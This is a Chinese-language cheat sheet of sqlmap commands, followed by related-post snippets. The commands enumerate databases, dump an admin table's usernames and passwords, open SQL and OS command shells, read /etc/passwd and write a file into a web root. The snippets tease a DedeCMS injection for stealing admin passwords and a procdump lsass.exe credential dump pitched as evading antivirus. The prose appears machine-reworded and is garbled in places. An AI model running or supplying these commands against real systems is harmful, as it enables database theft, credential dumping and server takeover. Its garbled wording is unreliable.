Sqlmap是一个技术专业的SQL引入专用工具,使用 *** 也许多,实际可以用"sqlmap -hh"查询详细的指令帮助文件,我这仅仅给大伙儿共享一些最常见的Sqlmap用法:
1、查验引入点
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11
2、爆全部数据库查询信息内容
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --dbs
爆当今数据库查询信息内容
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-db
3、列举特定数据库查询全部的表名
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D fujieace --tables
'fujieace' 为特定数据库查询名字
4、列举特定表名的全部字段名
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin --columns
'admin' 为特定表名字
5、dump输出打印表名特定列姓名段的值数据信息
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin -C name,password --dump
'name,password' 为特定字段称
1、列举数据库查询智能管理系统客户:
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --users
查询当今数据库连接客户:
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-user
2、分辨当今客户是不是DBA?
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --is-dba
3、查询用户权限:
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges -U fujieace
1、sql shell
这儿根据sqlmap能够立即获得一个sql shell,立即实行sql语句开展互动。
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --sql-shell
sql-shell> select version();
留意:这儿因为进入了sql shell能够实行sql语句了,还可以用 load data infile、load_file、into outfile等涵数来开展文档载入或载入;
2、cmd shell
这 里根据sqlmap能够立即获得一个cmd shell,立即实行cmd指令开展互动。
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-shell
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-cmd=ipconfig
3、载入 *** 服务器上特定文档
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=/etc/passwd
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=d:/test.txt
4、载入本地文件到 *** 服务器上
[email protected]:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-write /test/test.txt --file-dest /var/www/html/1.txt
Acunetix Web Vulnerability Scanner(通称 AWVS )是一款著名的互联网漏洞检测专用工具,它根据爬虫技术检测营业网点安全性。 很多人都想有着一款专用工...
什么叫Tamper Data? Tamper Data是Mozilla Firefox拓展,能够在推送HTTP恳求以前改动和查询HTTP恳求。它将显示信息Web电脑浏览器意味着您推送的数据信息,比如...
需要:magic_quotes_gpc = Off DedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码: http://www.chncto.com/de/membe...
NO.1:黑客基地 站长:孤独剑客,中国黑客界第二代黑客泰斗人物。 他的名字已经在黑客界家喻户晓。他正演绎属于他自己的黑客生涯,同时他用自身的技术实力征服着每个向往黑客的人。黑客基地自2003年...
Argus是啥? Argus可用以协助适用网络信息安全管理方法和互联网调查取证。根据恰当的对策,克罗地亚数据信息能够 被采掘,以明确您是不是古代历史遭受侵入或进攻,在公布进攻并明确了让步指标值(IO...
使用procdump,由于是微软的东西,带微软签名杀软不会报毒。 procdump -accepteula -ma lsass.exe lsass.dmp copy出 ls...